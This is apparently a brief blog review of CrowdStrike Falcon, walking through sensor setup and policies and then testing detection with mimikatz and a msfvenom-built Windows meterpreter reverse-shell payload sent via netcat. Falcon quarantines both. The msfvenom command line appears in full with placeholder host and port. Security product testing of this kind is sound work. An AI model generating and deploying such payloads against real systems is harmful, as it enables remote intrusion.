Review of Falcon Crowdstrike

What is Falcon Crowdstrike?

Falcon CrowdStrike is a platform built specifically to stop breaches and prevent attacks of all kinds.

Let’s dive in

sensor-falcon
First let’s set up the sensor…

And then we check if our sensors are working.

On windows

cmd-query-for-sensors

On falcon

installed-sensor
&&
sensorr-check

Now we need to add some policies before we test the falcon.
For this we must add our computers to a group because the policy will affects all of that group.

creation-group

From here we can add our computer to a group.
After that we can make our policy.

create-policy

Now let’s try to install mimikatz.
For this I used git command.

installation-mimikatz

And we can see Falcon’s notification at the bottom right. And Falcon quarantined this entire file.

quarantined-files

If we look at the endpoint detection pane, it looks like this…

crowdstrike-review

Now let’s create reverse shell for windows with mfsvenom.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip-addr> LPORT=<port-number> --format exe -o payload.exe

msfvenom-payload

And sending this payload with netcat to windows.
netcat-payload

Now we can listen with msfconsole.

payload-falcon-result
When you click the run file, Falcon detects this file and quarantines it.